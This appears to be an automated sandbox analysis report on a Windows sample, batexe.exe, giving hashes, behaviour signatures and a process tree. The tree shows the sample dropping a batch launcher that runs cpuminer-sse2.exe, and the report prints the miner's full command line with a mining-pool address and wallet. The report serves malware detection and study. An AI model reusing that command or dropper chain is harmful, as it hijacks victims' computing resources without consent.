Analysis
-
max time kernel
293s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
14-02-2024 11:30
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4488 b2e.exe 2408 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2408 cpuminer-sse2.exe 2408 cpuminer-sse2.exe 2408 cpuminer-sse2.exe 2408 cpuminer-sse2.exe 2408 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2904-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2904 wrote to memory of 4488 2904 batexe.exe 85 PID 2904 wrote to memory of 4488 2904 batexe.exe 85 PID 2904 wrote to memory of 4488 2904 batexe.exe 85 PID 4488 wrote to memory of 2136 4488 b2e.exe 86 PID 4488 wrote to memory of 2136 4488 b2e.exe 86 PID 4488 wrote to memory of 2136 4488 b2e.exe 86 PID 2136 wrote to memory of 2408 2136 cmd.exe 89 PID 2136 wrote to memory of 2408 2136 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\7119.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\7119.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7119.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7530.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2408
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17.9MB
MD56514ef7d701e71a091fcd20cc63238ad
SHA195b36ccbeedea6d471498e65a8d1041ed094d2d0
SHA25628b0fd9465c05d565ceb7bb622d1ebc43cc4fabaed0a728b298ad6cf033f2d39
SHA512adbcd00b33de44c59e6cb9bbd1d8e6742f81aa542c569f4da0d3f0e229b0faaa45eb22e0a6cef709c6c87ab28c593a1aebba8b4851982d6305369127912d44c8
-
Filesize
5.3MB
MD5f33a0f5faefcba6cb34d60d133ceba8f
SHA136fb52736688734efe275ff57261cb36fae4929e
SHA256db41f9c97b844f02ff67a24572addb22402cafc5e1a1f4c9c63d1538213c8d1b
SHA51214d3e4da2d3f741aae18cfaab2e7ba9385b3eaccc7de4c54f0a759730a2f276ac193a9fbee264d39d545bad7177498264a8e8effb97eb006639d0c706f59ce11
-
Filesize
4.6MB
MD57d7868459691a2c328873b785a431e5c
SHA16c3ff9e0d21a95df0900c498d1bd6b29b6a780d9
SHA256fc1461f288f8798085b382f92a49c1f41127d18a15ff96d5c772f58a34c032c5
SHA512e6cd8ff58d9b05ea241678f213047b679b1df9787d5f3608015764a4bf3b46bfb6c76e6b6c7407cde0c1200d5c95720a602a857710b3fe615990f4cab5269b63
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
995KB
MD55ae2db8eed06a5bcd37e0e6eae582055
SHA19477dfbfee401dd1cf8135b85ba424cbf4cfd74c
SHA2567fda3f7a9b07fe6e91b9dae2b8165191b4416dee54d8241bb51d3860946eecbd
SHA512c261b514072b35500f1de7f215cf46c7ad8ac52c530d8f431321fcbc0dde46d55eaa11009d57b04aaba92d9d59f67d95f60047515d8174239504dc6111163670
-
Filesize
992KB
MD5740529e5fe410285c47cb284bedebe08
SHA150b1c0ec8ca53611aa9bf32c0ccabce3d01050b3
SHA2560e07cf377f7fc3c594867941a66ec6726c02e44f2ac4cd40e808d8c2866ac12c
SHA51210586b06474d34232e814c7f4e3702bdfbb50ef9943534d4e7d851c18764cd289502f363db13b32d81d04f9ce78bb9d74cb8ef647b3e95dbcb149b7124e891cb
-
Filesize
597KB
MD5c8274c3221d5ea6615acf4c5e7fc9409
SHA1369770f860e1db3bf98bebad7939f701628763a1
SHA2560cbaab624d8dff114419743250bbdd32054d57c0dcf6ed67f19e69f436655718
SHA512e6f9368b60d719aaa2c8200246a47cff6b5dafef6690dd1380af5d49ede778a4ed2610679ccb969eb95aa521c01a298a53313528a2cc6955cb9a038a046dfd33
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
969KB
MD5f9ac185ec6b591b5b3c26ef368adbaf0
SHA11b4a0308a45aa41a6bbe175f7c37728e78ac0672
SHA256df207329f4c4a419b1ab9bc33f844dbcfb0e7c3145395ba03ac6df4571a627d9
SHA512f71d551d7fb14046d19680af276da85f08487000ccec108c0644e2ed73e42aac7b6e06602d0d13015231450487cb96ba67e0d7ea0c589bf43f1073f909f3db13
-
Filesize
665KB
MD56d8377b2897a984f0e48255456a5f022
SHA1c77f4c231f18043cddc6d266b796a3868900f9fb
SHA256f05c23fcf702cecde89289655a22f7d64b245c3e6a9486432bd9db756a8ba254
SHA5129f580195df788a61fdda52ac0c56c201343988a0b177974e7963eaf49f20942c3d48067db967734bae36cf3cf26455b6ba1429bf714d9f9514d59fbc32b0e15f
-
Filesize
1.2MB
MD5c0e6739bb34b652b2265b83a25687187
SHA1fdfbb11f6d43e41a3ce1d7461650e1729fbfa7fb
SHA25610dc5bf722528f9e1fac95342b026ba9273d9fd577439799734a328cfed3585f
SHA5128f43eea3479b8c62fba13299ff3968a98cca657cc7a9f1df575f32df47289bb5496295661d824f8194b03e3036b761b330e189b21c6fe85f95e4009b142547a7
-
Filesize
744KB
MD58a0d4d71732b959eec260896f6a05379
SHA16a0040d680f4742526985737ae2522a5c9884f9c
SHA25664a87939433c060e81831adad24a1a87062c71d6f51370de18f446d13b5d9ab9
SHA51274aff0ecf3605050250cbee6ee1e42886288d02c7faa22b7e26bc3c103084f7671abf95581e19fdde3b9430473e21d8e3a2a1059f2c56248e061ed182d3e9a70
-
Filesize
413KB
MD536582e187e589118f40ab86370845193
SHA1fc3ad02ba4c264916bb16e9d07f7c8d4a6a56562
SHA256cd2ebe0685c6ae72bc3db4def5bf81b002c373978dc13b1f442674dbeafde34f
SHA512630091990e7150c699868b9e8907860ea7a4fc62536fb06f09d1bd075c19e10f0fd3413f89565b94534363feace972f6ada7c8957f0d7a6183f8548842bbdaed
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770